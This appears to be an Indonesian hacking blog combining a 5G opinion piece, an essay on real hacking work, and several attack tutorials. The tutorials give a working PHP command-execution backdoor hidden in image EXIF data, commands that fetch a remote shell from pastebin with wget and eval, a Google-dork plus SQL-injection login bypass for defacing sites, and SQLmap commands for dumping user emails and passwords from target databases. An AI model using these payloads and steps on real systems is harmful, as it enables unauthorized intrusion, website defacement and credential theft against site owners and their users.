Mengapa teknologi 5G ditakutkan oleh Amerika Serikat?


Halo guys kali ini omheker penasaran Mengapa teknologi 5G ditakutkan oleh Amerika Serikat? Bayangkan saja semua (atau hampir semua) benda di dunia ini —mulai dari mobil yang bisa menyetir sendiri sampai peralatan rumah tangga —bisa terhubung melalui udara.
Itulah salah satu efek yang bisa dibawa oleh 5G dengan bandwidth-nya yang bisa mencapai 20 Gb/detik, di mana kita bisa mengunduh film HD dalam hitungan detik dan bahkan menggunakan augmented reality di ponsel pintar kita.
Semua itu bisa terjadi karena 5G beroperasi menggunakan dua cakupan frekuensi yang berbeda. Di satu mode 5G akan menggunakan frekuensi yang sama seperti 4G dan jaringan WiFi saat ini, dengan skema pengkodean yang lebih efisien dan ukuran channel yang lebih besar yang akan menambah kecepatan hingga 25–50%; sementara di mode lainnya 5G menggunakan gelombang milimeter yang jauh lebih tinggi, yang bisa mengirimkan data dengan kecepatan yang lebih tinggi lagi, meski cakupannya akan lebih rendah.
Lalu kenapa teknologi 5G ditakuti oleh Amerika Serikat?

Data adalah kekuatan di dunia yang saling terhubung seperti saat ini. Siapa yang bisa mendominasi teknologi 5G lebih dulu akan lebih berpotensi menguasai perangkat yang terkoneksi ke teknologi tersebut. Siapa yang mendominasi teknologi 5G akan jadi pemilik generasi infrastruktur telekomunikasi selanjutnya.
Dan siapa yang saat ini memimpin soal pengembangan teknologi 5G dibandingkan Amerika?
Huawei —perusahaan asal Tiongkok.
Jadi, menurut saya, yang ditakutkan oleh Amerika bukanlah teknologi 5G itu sendiri, tapi kemungkinan kenaikan kekuatan ekonomi dan militer Tiongkok yang disebabkan oleh kemajuan mereka dalam teknologi 5G.
Kalo menurut agan agan gimana?

Related Posts:


Bagaimana Menyisipkan Backdoor PHP Ke Dalam file Gambar

shell backdoor

Halo guys jumpa lagi, kali ini om heker akan membagikan tutorial  akan di tutorial kali ini saya akan memberi tutorial Bagaimana Menyisipkan Backdoor PHP Ke Dalam file Gambar, seperti kalian tahu backdoor adalah jalan pintas dalam keamanan sistem yang digunakan oleh para hacker untuk akses masuk ke dalam suatu system.

Mungkin beberapa dari kalian yang pernah masuk kedalam sistem dashboard suatu website akan tetapi pada saat sedang mengupload shell tidak bisa dikarenakan file yang diperbolehkan adalah image only dan biar ditamper pun tidak akan bisa. Berikut tutorial membypass nya dengan menyisipkan backdoor PHP ke dalam gambar.

Bahan - Bahan yang diperlukan (Windows ):

  1. Exif Editor ( Download Disini )
  2. Gambar yang akan  di sisipkan

Code Backdoor PHP :

<style>body{font-size: 0;}h1{font-size: 12px}</style><h1><?php if(isset($_REQUEST['cmd'])){system($_REQUEST['cmd']);}else{echo '<img src="LINK GAMBAR" border=0>';}__halt_compiler();?></h1>
Tips! : LINK GAMBAR isilah dengan url gambar kalian contohnya
<style>body{font-size: 0;}h1{font-size: 12px}</style><h1><?php if(isset($_REQUEST['cmd'])){system($_REQUEST['cmd']);}else{echo '<img src="https://dummyimage.com/1280x510/000/fff.jpg" border=0>';}__halt_compiler();?></h1>

Step cara caranya :

  • Bukalah Exif Editor
Screenshot001
  •  Kemudia klik Open lalu pilihlah gambar yang ingin disisipkan Backdoor PHP.
Screenshot002
  • Klik gambar plus (+)
Screenshot003
Klik Yes.
Screenshot004
  • Setelah itu Isilah Type sesuai gambar dibawah ini dan juga isilah Value dengan keinginan kalian, lalu klik Add.
Screenshot005
  • Kemduian lakukan klik 1 Pending Change
Screenshot010
  • Setelah itu klik Edit Modification
Screenshot009
  • Lalu Masukan kode PHP yang ada di atas tadi kedalam New Value lalu kemudian klik Save
Screenshot008
  •  Lalu Klik Save 
Screenshot006
Setelah itu Pilih lah tempat penyimpanan gambar yang sudah di inject tadi dan klik save

Screenshot011
  • Ubahlah extensi gambar tadi menjadi 
namagambar.jpg.php
  • Dan cobalah cek menggunakan notepad ++ apakah sudah terinject.
Screenshot014
Dan ternyata sudah terinject/ tersisipkan
  • Kemudian Kalian coba upload ke website target dan ketika sudah berhasil mengupload lalu akses lah gambar tadi dan coba masukan ?cmd= pada belakang nama gambar contohnya target.com/mastahcyber.jpg.php?cmd= lalu masukan perintah berikut uname -a contohnya ?cmd= uname -a dan jika muncul keterangan server target berarti berhasil seperti gambar dibawah ini.
Screenshot015
  •  Selanjutnya cobalah upload shell menggunakan perintah.
echo '<?php eval("?>".file_get_contents("https://pastebin.com/raw/en5tp4kX"));?>' > shell.php
Bisa juga
wget https://pastebin.com/raw/en5tp4kX -O shell.php 
Tips! : Yang saya berikan warna biru kamu bisa ubah dengan shell yang kamu inginkan dan yang warna kuning itu untuk nama shell nya dan kamu juga bisa mengubahnya.
  • Cobalah kamu akses shell yang sudah kamu upload tadi sesuai nama shell dan letak dir. contohnya target.com/shell.php
Screenshot016


Dan shell pun terupload dan kita berhasil membypass nya  nah mudah kan.
Sekian dulu tutorial dari om heker, sampai jumpa di tutorial berikutnya dan nantikanlah tutorial menarik lainnya. jangan lupa share ya





Penulusuran terkait:
cara menyisipkan backdoor metasploit ke gambar termux
cara inject php ke gambar
membuat exploit dengan gambar
jhead termux
backdoor image php
menyisipkan file backdoor menggunakan termux
cara membuat backdoor dengan kali linux
exif php shell

Related Posts:


Gimana Rasanya Menjadi Seorang Hacker



Tangan gemetaran. Peluh mengucur dari dahimu.
Sudah 2 bungkus rokok yang kamu habiskan dan 3 jam sudah berlalu tapi kamu masih belum berhasil membobol sistem keamanan bank nasional ini.
Punggungmu sudah pegal. Sistem firewall bank ini sangat ketat. Ada berlapis lapis firewall dimana semuanya memiliki sistem kecerdasan buatan yaitu AI yang dapat mempelajari setiap serangan yang kamu lakukan.
Kamu mulai pusing. Rasanya hampir tidak ada celah untuk membobol sistem keamanan bank ini.
Hanya ada satu cara.
Kamu harus mengirimkan virus langsung ke sistem tersebut!

Oke, semua sudah selesai. Kodenya nampak bagus. Monitor yang ada di sebelah kiri menunjukkan pertahanan sistem mulai goyah.
Monitor diatas menunjukkan adanya peningkatakan aktivitas usage CPU di sistem yang kamu coba bobol.
Ini bagus! Sudah saatnya kamu mengirimkan satu file terakhir!
Kamu menekan tombol upload. Monitor di sebelah kanan mulai memunculkan gambar gembok terbuka berwarna hijau, pertanda firewall sudah mati!
Kamu berhasil!
Uang di setiap rekening di transfer ke sebuah rekening rahasia yang sudah terenkripsi. Kamu yakin, mustahil direktur teknologi bank itu dapat menemukan jejakmu!
Sebagai salam perpisahan, kamu meninggalkan satu halaman dan foto "Anonymous" di laman server bank itu (Anonymous adalah grup hacker kondang yang terkenal suka melakukan DDOS dan pencurian data rahasia pemerintah):


Kamu bergumam, "Hmph, bagus! Sekarang aku adalah bagian dari Anonymous! Akulah yang terhebat!"
Tapi…
Oh tidak. Kamu ceroboh. File gambar yang kamu kirim meninggalkan residu!
Ada jejak EXIF di dalamnya sehingga FBI melacak lokasi GPS foto, yaitu di rumah kamu sendiri!
"Gawat, monitorku sudah menghitam dengan logo FBI di hadapanku!"
Suara helikopter meraung-raung di kepala. Sirene polisi mulai memekakkan telinga. "This is FBI! You have been surrounded! Surrender now or we will shoot!"
Kamu tiba tiba panik, "Tidak ada satupun yang boleh mengetahui rahasia sistemku ini !" Lalu kemudian kamu membakar dan menghancurkan setiap komponen komputer yang kamu miliki agar jejak jejakmu tidak diketahui
Kamu kabur lewat pintu belakang.
"Stop!" kata petugas FBI.
DOR! DOR! DOR!
Peluru berdesingan di kepalamu. Kamu tidak peduli dan terus berlari…
Oke, stop sampai disini.
Seperti itukah gambaran hacking yang kamu pikir?
Apakah kamu menyangka hacking itu seperti ini:
Ada banyak komputer dengan deretan baris kode terstuktur rapi dan tidak jelas, kemudian kamu duduk di ruangan yang gelap memakai hoodie?


Jika jawaban kamu adalah "Iya", maka saya ucapkan selamat, kamu sudah tersihir oleh film-film Hollywood.
Dalam dunia hacking yang sesungguhnya, tidak akan ada yang pernah mengaku-ngaku sebagai hacker. Baik itu di grup Facebook, Telegram, ataupun forum khusus hacking di dunia. Biasanya mereka memiliki komunitas peretas dan memiliki channel private yang hanya diketahui oleh kalangan mereka saja.
Benar, tidak akan ada yang mau mengaku sebagai hacker, tidak akan ada yang secara terang-terangan menyebutkan, "Woi, gue ini hacker lho! Jangan macam-macam ya! Ntar gue hack komputer lo!" kecuali bocah yang baru belajar mengklik "Lupa Password" di akun Facebook pacarnya dan menjawab pertanyaan rahasia seperti tanggal lahir dan nama tempat sekolah pertama kali. Kemudian Setelah berhasil mejebolnya, dan mengotak-atik isi profil pacarnya, dia tersenyum puas, "Aku sudah menjadi hacker!"
Apa rasanya menjadi peretas?
Biasa saja. Tidak ada sesuatu yang luar biasa dari hal ini.
Seriously, apa yang mau dibanggakan?
Karena pada dasarnya hanya ada dua tipe peretas.
Yang ingin menggunakan ilmunya untuk perbuatan kriminal seperti mencuri data-data perusahaan dan mencuri uang.
Lalu yang ingin menggunakan ilmunya dan membuka jasa konsultasi IT untuk membantu perusahaan-perusahaan besar dan pemerintah untuk menyimpan data-datanya agar lebih aman.
Kegiatan hacking atau meretas tidak jauh berbeda dari tugas seorang bug finder yaitu mencari celah di sebuah sistem.
Kalau kegiatan peretasan itu diminta sendiri oleh pemilik sistem, maka tindakan tersebut dinilai legal karena dianggap sebagai testing sistem keamanan. Kalau tidak diminta, dan Anda main bobol sendiri, ya sudah jelas ilegal. Penjara menantimu.
Memangnya kerja hacker itu seperti apa? 
(white hat) tidak lebih seperti pekerjaan di kantor sehari-hari. Masuk kerja, isi absen, kemudian buka codingan program, lakukan penetrasi server, bug finding, testing firewall dengan brute force, pokoknya apapun teknik hacking yang ada akan di lakukan sebagai bentuk preventif sistem.
Jika ada celah untuk membobol data, dibuat laporannya dan ditulis rekomendasi tindakan preventifnya apa aja, termasuk memberikan training keamanan IT pada seluruh karyawan yang masih gaptek.
Karena aktivitasnya "hacker" seperti orang kantor pada umumnya ya Makanya, saya bilang biasa saja.

Jika kamu berniat untuk terjun ke dunia hacking atas dasar coba-coba, maka saran saya adalah keep it to yourself. Jangan pernah mengobral diri Anda sebagai hacker hanya untuk mendapat pujian dan sanjungan dari bocah-bocah.
kamu harus tau karnea Diatas langit masih ada langit, sehebat apapun kamu pasti masih ada yang lebih hebat lagi diluar sana, khususnya dalam hal hacking. Jadi, mau nyombong bisa membobol sebuah situs pakai "Tools Hacking WordPress" bisa-bisa Anda malah akan menjadi bahan bully-an. Salah satu indikator hacker yang masih pemula adalah ngemis-ngemis minta tools hacking serba otomatis.

Related Posts:


Cara Deface Metode Bypass Admin terbaru

Bypass Admin

Halo guys... kali ini om heker akan membagikan tutorial deface selanjutnya yaitu Cara Deface Metode Bypass Admin, deface menggunakan cara ini tergolong mudah diantara metode lainnya.

Kenapa mudah? karena metode deface ini memanfaatkan celah sqli yang ada pada halaman login. dengan menginput username dan password bug SQL

Yuk gak perlu berlama lama kita simak baik baik tutorial cara melakukan deface menggunakan metode bypass admin :

  • Dorking, dork :
inurl:/admin/login (kembangkan gan)

  • Pilih salah satu situs target.
  • Setelah kalian masuk kedalam halaman login admin, kemudian anda masukan kode berikut pada kolom username dan juga password 
'="or'


IMG_20180531_093613-picsay
  • Jika kalian berhasil masuk kedalam halaman dashboard admin berarti kalian berhasil.

Screenshot_20180531-094101-picsay

  • Selanjutnya kalian tinggal upload shell pada form upload yang ada.

Screenshot_20180531-094350-picsay
  • Setelah kalian mengupload shell backdoor kalian akses lah shell tersebut lalu upload lah script deface kalian.
IMG_20180531_094751-picsay

Oke guys, diatas adalah salah satu contoh web yang bisa di eksekusi, silahkan mencari lagi web yang serupa, gunakan insting liar kalian wkwkwkwkw,

Oke sekian dulu tutorial dari om heker ini hanya untuk pelajaran janganlah digunakan untuk tindak kejahatan cyber.

Terimakasih telah berkunjung di blog omheker, kalo bermanfaat silahkan anda bagikan share sebanyak banyak nya dan tunggu tutorial tutorial menarik lainnya.





Penulusuran terkait:

bypass admin 2019
deface bypass admin terbaru
bypass admin login wordpress
dork bypass admin
password bypass admin login
cara deface bypass admin 2019
 dork bypass admin 2019
web vuln bypass admin

Related Posts:


Tutorial SQLmap Untuk Pemula


Halo Guys jumpa lagi bersama omheker. ya kali ini omheker akan membagikan Tutorial SQLmap untuk pemula, sebelum itu apakah kalian sudah tau apa itu SQLmap? yuk kita simak penjelasan dibawah ini.


Apa Itu SQlmap?

SQLmap ialah tool atau alat otomatis mengeksploitasi SQL yang sangat populer, dengan menggunakan tool atau alat ini kalian dapat mendapatkan database dari sebuah website dengan mudah dan cepat. Alat ini bisa dikatakan alat untuk hack atau meretas website yang ampuh.


Tutorial Mengunakan SQLmap Untuk Pemula

Misalkan kalian sudah mempunyai target situs untuk di injeksi oleh SQLmap, anggap saja url situs tersebut seperti berikut. 


 site.com/news.php?id=1
Untuk, mengecek apakah situs tersebut vuln atau memiliki celah SQL-I, kalian tinggal menambah kan tanda ' dibelakang url seperti berikut.

 site.com/news.php?id=1'
Untuk memastikan situs tersebut vuln, jika kalian menambahkan ' dibelakang url dan munculnya error ataupun blank berarti situs tersebut vuln atau bisa di injeksi oleh SQLmap dan sebaliknya jika tidak, berarti tidak vuln atau memiliki celah SQL.

oke jika kamu sudah mempunyau target situs yang sudah vuln kamu tinggal lakukan menyalin url situs target terlebih dahulu. Lalu kemduian buka cmd, terminal atau termux kalian, setelah masuk kedalam direktori tool SQLmap, dan running perintah berikut untuk melakukan injeksi ke situs tersebut.


 python2 sqlmap.py "site.com/news.php?id=1" --dbs
Otomatis SQLmap akan menginjeksi situs tersebut, dan akan mengambil database situs tersebut, nah misalkan kalian sudah mendapatkan nama atau info database seperti berikut.


 available databases [2]: 
 [*] information_schema 
 [*] mastahcyber
Selanjutnya jika kalian ingin mengetahui tabel mastahcyber dari database tersebut kalian tinggal, menggunakan perintah berikut.


 python2 sqlmap.py "site.com/news.php?id=1" --tables -D mastahcyber
Setelah kalian mendapatkan tabel dari database tersebut, misalnya kalian mendapatkan tabel sebagai berikut.
 [*] user
[*] admin
Nah jika kalian ingin mengetahui isi tabel, kalian tinggal menggunakan perintah.


 python2 sqlmap.py "site.com/news.php?id=1" --columns -D namadatabase -T namatabel
Contoh kita akan melihat isi tabel user dari database mastahcyber, kita tinggal menggunakan perintah.


 python2 sqlmap.py "site.com/news.php?id=1" --columns -D mastahcyber -T user
Setelah kalian mendapatkan isi dari tabel, misalnya isi tabel tersebut seperti berikut. 
 Table: user [8 columns] 
 +-------------------+--------------+
| Column            | Type         |
+-------------------+--------------+
| email             | text         |
| hash     | varchar(128) |
| id              |    int(11)    |
| name       |    text         |
| password          | text         |
| id                | tinyint(5)   |
| access            | text         |
| system_user       | text       |
+-------------------+--------------+
Nah jika kalian ingin mengetahui email dan password dari dari database mastahcyber dan tabel user, kalian tinggal menggunakan perintah.


 python2 sqlmap.py "site.com/news.php?id=1" --dump -D mastahcyber -T user
Dan kalian pun akan mendapatkan informasi email dan password dari database tersebut.

Oke  mudahkan? oke sekial dulu tutorial dari omheker menggunakan SQLmap untuk pemula, sekian sampai jumpa jika bermanfaat jangan lupa share ya... trima kasih




Penulusuran terkait:

sqlmap online sqlmap termux sqlmap apk cara menggunakan sqlmap cara menggunakan sqlmap di termux

tools sqlmap termux tutorial sqlmap termux cara install sqlmap di termux

Related Posts: